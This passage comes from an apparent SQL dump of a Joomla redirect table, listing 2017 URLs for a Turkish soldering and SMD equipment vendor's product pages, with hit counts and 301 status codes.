00:00:00',301),(9867,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',545,0,'2017-11-07 18:23:16','0000-00-00 00:00:00',301),(9868,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',591,0,'2017-11-07 18:23:32','0000-00-00 00:00:00',301),(9869,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-11-07 18:23:38','0000-00-00 00:00:00',301),(9870,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',221,0,'2017-11-07 18:29:34','0000-00-00 00:00:00',301),(9871,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/t_mi300_250x250.jpg',NULL,'','',1,0,'2017-11-07 18:33:10','0000-00-00 00:00:00',301),(9872,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_ly8c_250x250.jpg',NULL,'','',2,0,'2017-11-07 18:33:14','0000-00-00 00:00:00',301),(9873,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/cs-40_250x250.gif',NULL,'','',1,0,'2017-11-07 18:33:17','0000-00-00 00:00:00',301),(9874,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spartan_8s_250x250.gif',NULL,'','',2,0,'2017-11-07 18:33:45','0000-00-00 00:00:00',301),(9875,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/rl132_250x250.jpg',NULL,'','',1,0,'2017-11-07 18:33:58','0000-00-00 00:00:00',301),(9876,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/category/resized/rhii_640x420_250x250.jpg',NULL,'','',1,0,'2017-11-07 18:34:01','0000-00-00 00:00:00',301),(9877,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/am100_250x250.jpg',NULL,'','',1,0,'2017-11-07 18:34:07','0000-00-00 00:00:00',301),(9878,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/cs-40_250x250.gif',NULL,'','',1,0,'2017-11-07 18:34:55','0000-00-00 00:00:00',301),(9879,'http://3s-technologies.com.tr/tr/urunler/sp-18p-l-detail?tmpl=component&print=1',NULL,'','',12,0,'2017-11-07 18:45:14','0000-00-00 00:00:00',301),(9880,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,ordering?language=tr-tr',NULL,'','',25,0,'2017-11-07 18:51:08','0000-00-00 00:00:00',301),(9881,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-07 19:21:00','0000-00-00 00:00:00',301),(9882,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim',NULL,'','',160,0,'2017-11-07 19:24:05','0000-00-00 00:00:00',301),(9883,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/ly-8c-detail',NULL,'','',73,0,'2017-11-07 19:28:52','0000-00-00 00:00:00',301),(9884,'http://3s-technologies.com.tr/tr/urunler/spartan-8s-8d-detail?tmpl=component&print=1',NULL,'','',19,0,'2017-11-07 19:36:22','0000-00-00 00:00:00',301),(9885,'http://3s-technologies.com.tr/en/products/dalga-lehim/mi-300-detail',NULL,'','',22,0,'2017-11-07 19:37:59','0000-00-00 00:00:00',301),(9886,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name?language=en-gb',NULL,'','',2,0,'2017-11-07 19:38:39','0000-00-00 00:00:00',301),(9887,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/am100-detail',NULL,'','',227,0,'2017-11-07 19:48:21','0000-00-00 00:00:00',301),(9888,'http://3s-technologies.com.tr/en/products/2.-el-makineler/rh2-20-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-07 19:50:01','0000-00-00 00:00:00',301),(9889,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/ls60v-detail',NULL,'','',213,0,'2017-11-07 19:52:11','0000-00-00 00:00:00',301),(9890,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-07 20:04:48','0000-00-00 00:00:00',301),(9891,'http://3s-technologies.com.tr/tr/urunler/zero-ion-g3-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-07 20:04:53','0000-00-00 00:00:00',301),(9892,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/av132-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-07 20:12:30','0000-00-00 00:00:00',301),(9893,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',46,0,'2017-11-07 20:19:32','0000-00-00 00:00:00',301),(9894,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,product_name',NULL,'','',262,0,'2017-11-07 21:04:21','0000-00-00 00:00:00',301),(9895,'http://www.3s-technologies.com.tr/en/products/spr-20-41-detail?tmpl=component&print=1',NULL,'','',33,0,'2017-11-07 21:39:22','0000-00-00 00:00:00',301),(9896,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,category_name',NULL,'','',41,0,'2017-11-07 21:41:09','0000-00-00 00:00:00',301),(9897,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,mf_name/dirdesc?error=404&language=en-gb',NULL,'','',2,0,'2017-11-07 21:55:11','0000-00-00 00:00:00',301),(9898,'http://www.3s-technologies.com.tr/tr/?option=com_user&view=register',NULL,'','',21,0,'2017-11-07 22:06:38','0000-00-00 00:00:00',301),(9899,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-33-34-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-07 22:07:12','0000-00-00 00:00:00',301),(9900,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim',NULL,'','',28,0,'2017-11-07 22:08:41','0000-00-00 00:00:00',301),(9901,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-orta-hızlı',NULL,'','',1,0,'2017-11-07 22:10:48','0000-00-00 00:00:00',301),(9902,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim-31-32-33-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-07 22:14:31','0000-00-00 00:00:00',301),(9903,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail',NULL,'','',14,0,'2017-11-07 22:17:54','0000-00-00 00:00:00',301),(9904,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,category_name?language=tr-tr',NULL,'','',25,0,'2017-11-07 22:34:52','0000-00-00 00:00:00',301),(9905,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/ls60v-detail',NULL,'','',164,0,'2017-11-07 22:35:58','0000-00-00 00:00:00',301),(9906,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh2-detail',NULL,'','',41,0,'2017-11-07 22:48:27','0000-00-00 00:00:00',301),(9907,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,`p`.product_sku/dirdesc?error=404&language=en-gb',NULL,'','',3,0,'2017-11-07 22:48:50','0000-00-00 00:00:00',301),(9908,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name?language=en-gb',NULL,'','',9,0,'2017-11-07 22:56:07','0000-00-00 00:00:00',301),(9909,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim',NULL,'','',26,0,'2017-11-07 23:03:25','0000-00-00 00:00:00',301),(9910,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer?language=en-gb',NULL,'','',24,0,'2017-11-07 23:21:26','0000-00-00 00:00:00',301),(9911,'http://www.3s-technologies.com.tr/en/home2/79-english-uk?format=feed&type=atom',NULL,'','',2,0,'2017-11-07 23:25:11','0000-00-00 00:00:00',301),(9912,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',401,0,'2017-11-07 23:28:48','0000-00-00 00:00:00',301),(9913,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-07 23:29:56','0000-00-00 00:00:00',301),(9914,'http://3s-technologies.com.tr/index.php/en/products/275-k100-1mm-detail?tmpl=component&print=1',NULL,'','',10,0,'2017-11-07 23:31:05','0000-00-00 00:00:00',301),(9915,'http://3s-technologies.com.tr/index.php/en/products/245-sn63pb37-0.4mm-29-detail?tmpl=component&print=1',NULL,'','',17,0,'2017-11-07 23:33:02','0000-00-00 00:00:00',301),(9916,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc?language=en-gb',NULL,'','',6,0,'2017-11-07 23:34:01','0000-00-00 00:00:00',301),(9917,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim?error=404&language=en-gb',NULL,'','',1,0,'2017-11-07 23:34:20','0000-00-00 00:00:00',301),(9918,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',10,0,'2017-11-07 23:34:39','0000-00-00 00:00:00',301),(9919,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/dirdesc?language=en-gb',NULL,'','',9,0,'2017-11-07 23:35:47','0000-00-00 00:00:00',301),(9920,'http://3s-technologies.com.tr/index.php/en/products/e-bar-26-detail?tmpl=component&print=1',NULL,'','',15,0,'2017-11-07 23:36:30','0000-00-00 00:00:00',301),(9921,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',9,0,'2017-11-07 23:37:18','0000-00-00 00:00:00',301),(9922,'http://3s-technologies.com.tr/index.php/en/products?error=404',NULL,'','',1,0,'2017-11-07 23:38:14','0000-00-00 00:00:00',301),(9923,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,product_name/dirdesc?language=en-gb',NULL,'','',11,0,'2017-11-07 23:38:30','0000-00-00 00:00:00',301),(9924,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_sku?language=en-gb',NULL,'','',4,0,'2017-11-07 23:39:18','0000-00-00 00:00:00',301),(9925,'http://3s-technologies.com.tr/index.php/en/products/zero-ion-g3-detail?print=1&tmpl=component',NULL,'','',3,0,'2017-11-07 23:39:23','0000-00-00 00:00:00',301),(9926,'http://3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,category_name',NULL,'','',22,0,'2017-11-07 23:42:58','0000-00-00 00:00:00',301),(9927,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/spartan-8s-8d-44-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-07 23:50:41','0000-00-00 00:00:00',301),(9928,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-28-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-08 00:16:39','0000-00-00 00:00:00',301),(9929,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-08 00:19:01','0000-00-00 00:00:00',301),(9930,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,ordering?language=en-gb',NULL,'','',25,0,'2017-11-08 00:39:59','0000-00-00 00:00:00',301),(9931,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/dirdesc',NULL,'','',386,0,'2017-11-08 01:07:41','0000-00-00 00:00:00',301),(9932,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',58,0,'2017-11-08 01:09:36','0000-00-00 00:00:00',301),(9933,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',25,0,'2017-11-08 01:19:34','0000-00-00 00:00:00',301),(9934,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/dirdesc',NULL,'','',605,0,'2017-11-08 01:29:56','0000-00-00 00:00:00',301),(9935,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',5,0,'2017-11-08 01:35:09','0000-00-00 00:00:00',301),(9936,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,category_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-08 01:43:09','0000-00-00 00:00:00',301),(9937,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın?language=en-gb',NULL,'','',1,0,'2017-11-08 01:46:33','0000-00-00 00:00:00',301),(9938,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-08 02:08:41','0000-00-00 00:00:00',301),(9939,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',415,0,'2017-11-08 02:14:52','0000-00-00 00:00:00',301),(9940,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın',NULL,'','',256,0,'2017-11-08 02:16:41','0000-00-00 00:00:00',301),(9941,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/sp-18p-l-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-08 02:18:49','0000-00-00 00:00:00',301),(9942,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-08 02:24:30','0000-00-00 00:00:00',301),(9943,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/npm-detail',NULL,'','',237,0,'2017-11-08 02:36:28','0000-00-00 00:00:00',301),(9944,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux',NULL,'','',20,0,'2017-11-08 02:37:05','0000-00-00 00:00:00',301),(9945,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim/spartan-8s-8d-detail',NULL,'','',16,0,'2017-11-08 02:39:54','0000-00-00 00:00:00',301),(9946,'http://3s-technologies.com.tr/tr/urunler/screen-printer/by,product_sku',NULL,'','',19,0,'2017-11-08 02:41:46','0000-00-00 00:00:00',301),(9947,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,ordering?language=tr-tr',NULL,'','',1,0,'2017-11-08 02:43:06','0000-00-00 00:00:00',301),(9948,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer',NULL,'','',24,0,'2017-11-08 02:53:27','0000-00-00 00:00:00',301),(9949,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail',NULL,'','',17,0,'2017-11-08 02:53:59','0000-00-00 00:00:00',301),(9950,'http://3s-technologies.com.tr/en/products/npm-detail?tmpl=component&print=1',NULL,'','',17,0,'2017-11-08 03:00:07','0000-00-00 00:00:00',301),(9951,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,category_name?language=en-gb',NULL,'','',18,0,'2017-11-08 03:00:42','0000-00-00 00:00:00',301),(9952,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/ess-310-24-detail',NULL,'','',1,0,'2017-11-08 03:11:54','0000-00-00 00:00:00',301),(9953,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/jv131-detail?tmpl=component&print=1',NULL,'','',3,0,'2017-11-08 03:12:45','0000-00-00 00:00:00',301),(9954,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-08 03:14:09','0000-00-00 00:00:00',301),(9955,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/am100-detail',NULL,'','',238,0,'2017-11-08 03:16:24','0000-00-00 00:00:00',301),(9956,'http://www.3s-technologies.com.tr/tr/urunler/npm-detail?tmpl=component&print=1',NULL,'','',27,0,'2017-11-08 03:16:54','0000-00-00 00:00:00',301),(9957,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&itemid=141&lang=en',NULL,'','',5,0,'2017-11-08 03:37:15','0000-00-00 00:00:00',301),(9958,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail',NULL,'','',24,0,'2017-11-08 03:50:16','0000-00-00 00:00:00',301),(9959,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/category/resized/avk3_1m_250x250.jpg',NULL,'','',5,0,'2017-11-08 03:54:40','0000-00-00 00:00:00',301),(9960,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',25,0,'2017-11-08 03:55:05','0000-00-00 00:00:00',301),(9961,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/zero-g3_250x250.jpg',NULL,'','',1,0,'2017-11-08 03:55:20','0000-00-00 00:00:00',301),(9962,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/zero-g3_250x250.jpg',NULL,'','',1,0,'2017-11-08 03:58:28','0000-00-00 00:00:00',301),(9963,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer',NULL,'','',21,0,'2017-11-08 04:14:48','0000-00-00 00:00:00',301),(9964,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim-31-32-33-34-detail?tmpl=component&print=1',NULL,'','',11,0,'2017-11-08 04:21:07','0000-00-00 00:00:00',301),(9965,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız',NULL,'','',102,0,'2017-11-08 04:29:08','0000-00-00 00:00:00',301),(9966,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/dirdesc?error=404&language=en-gb',NULL,'','',4,0,'2017-11-08 04:53:11','0000-00-00 00:00:00',301),(9967,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,ordering?language=en-gb',NULL,'','',2,0,'2017-11-08 05:09:14','0000-00-00 00:00:00',301),(9968,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',9,0,'2017-11-08 05:15:43','0000-00-00 00:00:00',301),(9969,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/ess-310-24-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-08 05:19:25','0000-00-00 00:00:00',301),(9970,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/jv131-detail',NULL,'','',1,0,'2017-11-08 05:22:47','0000-00-00 00:00:00',301),(9971,'http://www.3s-technologies.com.tr/en/products/screen-printer/asp-300-detail',NULL,'','',42,0,'2017-11-08 05:24:24','0000-00-00 00:00:00',301),(9972,'http://3s-technologies.com.tr/index.php/en/using-joomla/extensions/templates/beez5/home-page-beez5/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',8,0,'2017-11-08 05:33:20','0000-00-00 00:00:00',301),(9973,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-08 05:38:25','0000-00-00 00:00:00',301),(9974,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/npm-detail',NULL,'','',6,0,'2017-11-08 05:39:24','0000-00-00 00:00:00',301),(9975,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name?language=en-gb',NULL,'','',2,0,'2017-11-08 05:42:46','0000-00-00 00:00:00',301),(9976,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/spartan-8s-8d-44-detail',NULL,'','',41,0,'2017-11-08 05:50:28','0000-00-00 00:00:00',301),(9977,'http://www.3s-technologies.com.tr/en/products/konveyorler/by,product_sku',NULL,'','',38,0,'2017-11-08 05:51:29','0000-00-00 00:00:00',301),(9978,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme',NULL,'','',362,0,'2017-11-08 05:59:44','0000-00-00 00:00:00',301),(9979,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/avf-detail',NULL,'','',30,0,'2017-11-08 06:11:50','0000-00-00 00:00:00',301),(9980,'http://3s-technologies.com.tr/tr/dmb-elektronik.com/joomla/index.php/fr/maison/91-french/french-contect?format=feed&type=rss',NULL,'','',3,0,'2017-11-08 06:20:51','0000-00-00 00:00:00',301),(9981,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,mf_name?language=en-gb',NULL,'','',4,0,'2017-11-08 06:24:19','0000-00-00 00:00:00',301),(9982,'http://www.3s-technologies.com.tr/en/products/screen-printer/dirdesc',NULL,'','',37,0,'2017-11-08 06:25:31','0000-00-00 00:00:00',301),(9983,'http://www.3s-technologies.com.tr/en/products/screen-printer/results,1-50',NULL,'','',2,0,'2017-11-08 06:30:14','0000-00-00 00:00:00',301),(9984,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-08 06:33:49','0000-00-00 00:00:00',301),(9985,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/npm-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-08 06:35:15','0000-00-00 00:00:00',301),(9986,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,mf_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-08 06:37:42','0000-00-00 00:00:00',301),(9987,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar',NULL,'','',23,0,'2017-11-08 06:39:04','0000-00-00 00:00:00',301),(9988,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/avf-detail',NULL,'','',20,0,'2017-11-08 06:39:08','0000-00-00 00:00:00',301),(9989,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/dirdesc',NULL,'','',38,0,'2017-11-08 06:45:14','0000-00-00 00:00:00',301),(9990,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/results,1-5',NULL,'','',5,0,'2017-11-08 06:50:14','0000-00-00 00:00:00',301),(9991,'http://www.3s-technologies.com.tr/en/products/konveyorler/dirdesc',NULL,'','',39,0,'2017-11-08 06:55:27','0000-00-00 00:00:00',301),(9992,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/results,1-5',NULL,'','',7,0,'2017-11-08 07:10:45','0000-00-00 00:00:00',301),(9993,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/results,1-10',NULL,'','',5,0,'2017-11-08 07:15:57','0000-00-00 00:00:00',301),(9994,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/gf-12-hc-ht-detail',NULL,'','',210,0,'2017-11-08 07:17:52','0000-00-00 00:00:00',301),(9995,'http://3s-technologies.com.tr/en/products/konveyorler',NULL,'','',31,0,'2017-11-08 07:26:41','0000-00-00 00:00:00',301),(9996,'http://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/e-bar-detail',NULL,'','',77,0,'2017-11-08 07:35:55','0000-00-00 00:00:00',301),(9997,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/by,product_sku',NULL,'','',375,0,'2017-11-08 07:39:56','0000-00-00 00:00:00',301),(9998,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-08 07:45:22','0000-00-00 00:00:00',301),(9999,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/dirdesc',NULL,'','',41,0,'2017-11-08 07:46:34','0000-00-00 00:00:00',301),(10000,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,category_name?language=tr-tr',NULL,'','',25,0,'2017-11-08 07:50:31','0000-00-00 00:00:00',301),(10001,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/by,mf_name',NULL,'','',42,0,'2017-11-08 07:51:55','0000-00-00 00:00:00',301),(10002,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-08 07:52:47','0000-00-00 00:00:00',301),(10003,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,category_name/dirdesc?language=tr-tr',NULL,'','',14,0,'2017-11-08 07:56:09','0000-00-00 00:00:00',301),(10004,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/results,1-50',NULL,'','',2,0,'2017-11-08 07:56:44','0000-00-00 00:00:00',301),(10005,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/am100-detail',NULL,'','',80,0,'2017-11-08 07:57:30','0000-00-00 00:00:00',301),(10006,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',231,0,'2017-11-08 08:03:52','0000-00-00 00:00:00',301),(10007,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/by,mf_name',NULL,'','',9,0,'2017-11-08 08:11:38','0000-00-00 00:00:00',301),(10008,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,ordering?language=tr-tr',NULL,'','',2,0,'2017-11-08 08:14:46','0000-00-00 00:00:00',301),(10009,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/le-40v-detail',NULL,'','',241,0,'2017-11-08 08:17:05','0000-00-00 00:00:00',301),(10010,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',377,0,'2017-11-08 08:21:29','0000-00-00 00:00:00',301),(10011,'http://www.3s-technologies.com.tr/tr/urunler/le-40v-detail?tmpl=component&print=1',NULL,'','',27,0,'2017-11-08 08:27:06','0000-00-00 00:00:00',301),(10012,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,category_name?language=en-gb',NULL,'','',24,0,'2017-11-08 08:34:59','0000-00-00 00:00:00',301),(10013,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/gf-12-hc-ht-detail',NULL,'','',94,0,'2017-11-08 08:37:53','0000-00-00 00:00:00',301),(10014,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/sp-18p-l-detail',NULL,'','',37,0,'2017-11-08 08:42:24','0000-00-00 00:00:00',301),(10015,'http://www.3s-technologies.com.tr/en/products/sp-18p-l-detail?tmpl=component&print=1',NULL,'','',33,0,'2017-11-08 08:52:37','0000-00-00 00:00:00',301),(10016,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/sp-18p-l-detail',NULL,'','',7,0,'2017-11-08 09:07:56','0000-00-00 00:00:00',301),(10017,'http://3s-technologies.com.tr/index.php/en/products/245-sn63pb37-0.8mm-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-08 09:11:29','0000-00-00 00:00:00',301),(10018,'http://www.3s-technologies.com.tr/en/products/asp-300-detail?tmpl=component&print=1',NULL,'','',37,0,'2017-11-08 09:12:54','0000-00-00 00:00:00',301),(10019,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,mf_name?language=en-gb',NULL,'','',24,0,'2017-11-08 09:14:10','0000-00-00 00:00:00',301),(10020,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/by,product_name?language=en-gb',NULL,'','',24,0,'2017-11-08 09:14:45','0000-00-00 00:00:00',301),(10021,'http://www.3s-technologies.com.tr/en/products/thru-hole/dirdesc',NULL,'','',36,0,'2017-11-08 09:28:04','0000-00-00 00:00:00',301),(10022,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_sku',NULL,'','',8,0,'2017-11-08 09:30:33','0000-00-00 00:00:00',301),(10023,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/asp-300-detail',NULL,'','',3,0,'2017-11-08 09:38:26','0000-00-00 00:00:00',301),(10024,'http://3s-technologies.com.tr/tr/urunler/thru-hole/av132-detail/askquestion?tmpl=component',NULL,'','',19,0,'2017-11-08 09:38:33','0000-00-00 00:00:00',301),(10025,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/lfs-1-photo_250x250.gif',NULL,'','',2,0,'2017-11-08 09:42:23','0000-00-00 00:00:00',301),(10026,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/ddm-novastar',NULL,'','',29,0,'2017-11-08 09:43:30','0000-00-00 00:00:00',301),(10027,'http://www.3s-technologies.com.tr/en/products/thru-hole/results,1-5',NULL,'','',2,0,'2017-11-08 09:58:35','0000-00-00 00:00:00',301),(10028,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,category_name?language=tr-tr',NULL,'','',8,0,'2017-11-08 10:17:58','0000-00-00 